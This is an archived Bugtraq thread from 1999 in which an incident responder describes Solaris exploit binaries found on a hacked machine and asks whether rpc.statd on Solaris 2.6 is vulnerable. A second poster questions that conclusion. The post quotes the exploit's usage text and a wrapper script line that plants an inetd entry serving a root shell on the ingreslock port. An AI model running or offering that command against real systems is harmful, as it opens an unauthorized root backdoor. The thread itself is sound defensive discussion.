Bugtraq mailing list archives
Re: Vulnerability in Solaris 2.6. rpc.statd ?
From: toddr () ARC COM (Bob Todd)
Date: Tue, 24 Aug 1999 14:10:40 -0400
I found two binary-only exploits on a hacked machine. The one of most
interest was "amexp" which when executed without arguments presents
the following:
Usage: ./amexp address cache command type [port]
Further help:
address - system address
cache - system hostname
command - execute this command
type - 0: Solaris 2.5.1 stock,
1: Solaris 2.5.1 patched, 2.6 & 2.7
port - optional port to bypass portmapper
A shell script that was included was "go.amexp" which contained:
./amexp $1 $2 "echo 'ingreslock stream tcp nowait root /bin/sh sh' >
/tmp/.xp;/usr/sbin/inetd -s /tmp/.xp" $3
The command is nearly identical to what is used for both tooltalk and
rpc.cmsd attacks
The proper patches were installed and I do not believe that it is the
statd/automountd exploit since
no indirect rpc services execution was attempted.
This incident is closed.
----- Original Message -----
From: Tabor J . Wells <twells () shore net>
To: Bob Todd <todd () home arc com>
Cc: <BUGTRAQ () securityfocus com>
Sent: Tuesday, August 24, 1999 1:52 PM
Subject: Re: Vulnerability in Solaris 2.6. rpc.statd ?
On Sat, Aug 21, 1999 at 12:31:18PM -0400, Bob Todd <toddr () ARC COM> is thought to have said:While performing an on-site incident response at _______, I found several Solaris-oriented exploit programs including a statd2.6 (others were calendar manager, tooltalk, and lockd?). Since there is an exploit program for statd on Solaris 2.6, I could conclude that Solaris 2.6 statd is vulnerable to attack. I have not tried the exploit, but since the machine was probably compromised by one of these programs, the threat seems real!!And did this server have the statd patch installed (106592-02 on
sparc and
106593-02 on x86)? Did it have the various security patches for the
other
services mention installed as well? Perhaps the program was part of the exploit which allowed indirect
RPC
calls with statd that was discussed here (and elsewhere) several
weeks
back. I don't think your conclusion is supported given the information you provided. Perhaps you could provide more information about the
exploit
before rushing to claim that there is a new vulnerability. Tabor --
______________________________________________________________________ __
Tabor J. Wells
twells () smarterliving com
Technology Manager
http://www.smarterliving.com
Smarter Living, Inc. It's your time. It's your
money.
Current thread:
- Re: [RHSA-1999:028-01] Buffer overflow in libtermcap tgetent(), (continued)
- Re: [RHSA-1999:028-01] Buffer overflow in libtermcap tgetent() Michal Zalewski (Jul 03)
- [RHSA-1999:029-01] Denial of service attack in in.telnetd Bill Nottingham (Aug 19)
- Re: [RHSA-1999:028-01] Buffer overflow in libtermcap tgetent() Olaf Kirch (Aug 19)
- Insecure use of file in /tmp by trn Martin Schulze (Aug 19)
- Winamp SHOUTcast server: Gain Administrator Password Michael (Aug 20)
- Re: Insecure use of file in /tmp by trn Rogier Wolff (Aug 21)
- IE 5.0 allows executing programs Georgi Guninski (Aug 21)
- Re: IE 5.0 allows executing programs David LeBlanc (Aug 23)
- Re: IE 5.0 allows executing programs Jesper M. Johansson (Aug 28)
- Vulnerability in Solaris 2.6. rpc.statd ? Bob Todd (Aug 21)
- Re: Vulnerability in Solaris 2.6. rpc.statd ? Bob Todd (Aug 24)
- Re: Vulnerability in Solaris 2.6. rpc.statd ? mb (Aug 28)
- Re: [RHSA-1999:028-01] Buffer overflow in libtermcap tgetent() Martin Schulze (Aug 19)
- Re: [RHSA-1999:028-01] Buffer overflow in libtermcap tgetent() Aaron Campbell (Aug 19)
- Microsoft Security Bulletin (MS99-030) Aleph One (Aug 20)
- Re: [RHSA-1999:028-01] Buffer overflow in libtermcap tgetent() Alan Cox (Aug 22)
- libtermcap exploit fix ... smashcap.c Hudin Lucian (Aug 22)
- Re: [RHSA-1999:028-01] Buffer overflow in libtermcap tgetent() Pavel Kankovsky (Aug 26)
- OCE' 9400 plotters Larry W. Cashdollar (Aug 19)
- Re: OCE' 9400 plotters Patrick Cantwell (Aug 23)
- Re: [RHSA-1999:028-01] Buffer overflow in libtermcap tgetent() Tymm Twillman (Aug 19)